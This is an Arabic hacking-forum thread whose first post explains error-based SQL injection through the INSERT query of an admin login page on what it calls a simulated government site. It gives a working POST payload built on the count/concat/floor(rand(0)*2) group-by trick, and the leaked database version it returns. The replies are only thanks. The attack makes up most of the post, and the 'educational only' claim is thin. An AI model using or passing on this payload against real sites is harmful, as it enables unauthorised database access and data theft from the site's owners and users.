حالة الموضوع:
مغلق
  1. ZeRo TiMe

    ZeRo TiMe Developer

    الأنتساب:
    ‏20 ديسمبر 2011
    المشاركات:
    41
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    قــ الأمة ـلــب
    السلام عليكم ورحمة الله

    اولا الفكرة محاكاة لموقع حكومي.. اقول فكرة وليس شرح .. فكرة الحقن استعلام insert

    معنا موقع مصاب في لوحة التحكم :

    كود PHP:
    www.site.gov.com/admin/login.php
    نضع ' في خانة اليوزر والباس :

    يظهر لنا خطأ :

    كود PHP:
    INSERT INTO project_user_logins (project_id,username,password,server_name,server_address,remote_address,succed,tsVALUES ('14'''', ''''www.site.gov.com''127.0.0.1''127.0.0.1''0''1382008397'You have an error in your SQL syntaxcheck the manual that corresponds to your MySQL server version for the right syntax to use near '\'''www.site.gov.com''127.0.0.1''127.0.0.1''0''1382008397'at line 1
    كما تلاحظون خانة ليوزر ليس عليها حماية addslashes اما خانة الباس فعليها حماية

    راح نستفيد من خانة اليوزر

    اول شيىء لو تلاحظ راح تشوف insert INTO

    هذا استعلام لإضافة شيىء الى القاعدة وبالأخص الجدول project_user_logins فيه 8 اعمدة :

    كود PHP:
    INSERT INTO project_user_logins (project_id,username,password,server_name,server_address,remote_address,succed,ts
    )

    والقيم الـ 8 :

    كود PHP:
    VALUES ('14'''', ''''www.site.gov.com''127.0.0.1''127.0.0.1''0''1382010385')
    اول قيمة هي 14 ثابتة وتخص العمود project_id يبقى امامنا 7 قيم

    احنا نستغل خانة اليوزر ونضع 7 قيم ثم فاصلة ثم استعلام الحقن .

    راح يكون الحقن هكذا :

    ملاحظة : الحقن عبر عملية POST ونوع الحقن ايرور بازد ..

    نضع في خانة اليوزر الآتياول قيمة هي 14 ثابتة وتخص العمود project_id يبقى امامنا 7 قيم

    احنا نستغل خانة اليوزر ونضع 7 قيم ثم فاصلة ثم استعلام الحقن .

    راح يكون الحقن هكذا :

    ملاحظة : الحقن عبر عملية POST ونوع الحقن ايرور بازد ..

    نضع في خانة اليوزر الآتي

    كود PHP:
    dz','1','2','3','4','5','6),((select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a))%23
    كل ما فعلناه اعطينا 7 قيم اللي يحتاجها الإستعلام ،، غلقنا الإستعلام بقوس
    ثم فاصلة : واستعلام جديد بين قوسين وفي الأخير عملنا تعليق ..

    وهذا شكل الإستعلام :

    كود PHP:
    INSERT INTO project_user_logins (project_id,username,password,server_name,server_address,remote_address,succed,tsVALUES ('14'''),((select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a))#', '', 'www.site.gov.com', '127.0.0.1', '127.0.0.1', '0', '1382010687') Duplicate entry '5.1.41-debug-log1' for key 'group_key
    '

    صورة :

    [​IMG]

    النتيجة :

    كود PHP:
    Duplicate entry '5.1.41-debug-log1' for key 'group_key'
    طبعا مش محتاجة تستعلم عن الجداول فهي امامك في الخطا .. فكرة الحقن استعلام insert

    الموضوع لسبب تعليمي فقط .. &:"

    تحميل الشرح

    [hide]SQLi in INSERT[/hide]

    )5:"​
     
  2. Crazy BoOoy

    Crazy BoOoy Developer

    الأنتساب:
    ‏1 نوفمبر 2011
    المشاركات:
    64
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الوظيفة:
    طالب
    الإقامة:
    J̺͆o̺͆r̺͆d̺͆a̺͆n̺͆
    رد: الحقن في استعلام insert

    الله يعطيك الف عافية اخي العزيز,
     
  3. كلآشنكوف

    كلآشنكوف Developer

    الأنتساب:
    ‏19 يوليو 2012
    المشاركات:
    88
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    رد: الحقن في استعلام insert

    تسلم ايدك مبدع
     
  4. salem k

    salem k Developer

    الأنتساب:
    ‏10 ديسمبر 2013
    المشاركات:
    5
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: الحقن في استعلام insert

    تسلم ايدك تسلم ايدك
     
  5. cute hacker

    cute hacker Developer

    الأنتساب:
    ‏28 يونيو 2013
    المشاركات:
    6
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: الحقن في استعلام insert

    thannnnnnnnnnnnnnnnnki:q^:
     
  6. X444X TEAM

    X444X TEAM Developer

    الأنتساب:
    ‏30 يوليو 2012
    المشاركات:
    47
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: الحقن في استعلام insert

    مشكور حبيبي
    جاري التقيم ان امكن[واصل ابداعكـً#ٌ5oًًًُ.]
     
  7. HaMaM-HaCkEr

    HaMaM-HaCkEr DeveloPer Plus

    الأنتساب:
    ‏22 نوفمبر 2012
    المشاركات:
    117
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    رد: الحقن في استعلام insert

    عليكم السلام ورحمة الله وبركاته

    باركـ الله فيك اخي وبمجهودك

    وفقك الله ,,,
     
  8. الديلر الفلسطيني

    الديلر الفلسطيني Developer

    الأنتساب:
    ‏14 يناير 2014
    المشاركات:
    5
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: الحقن في استعلام insert

    كفو ياا بطل
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة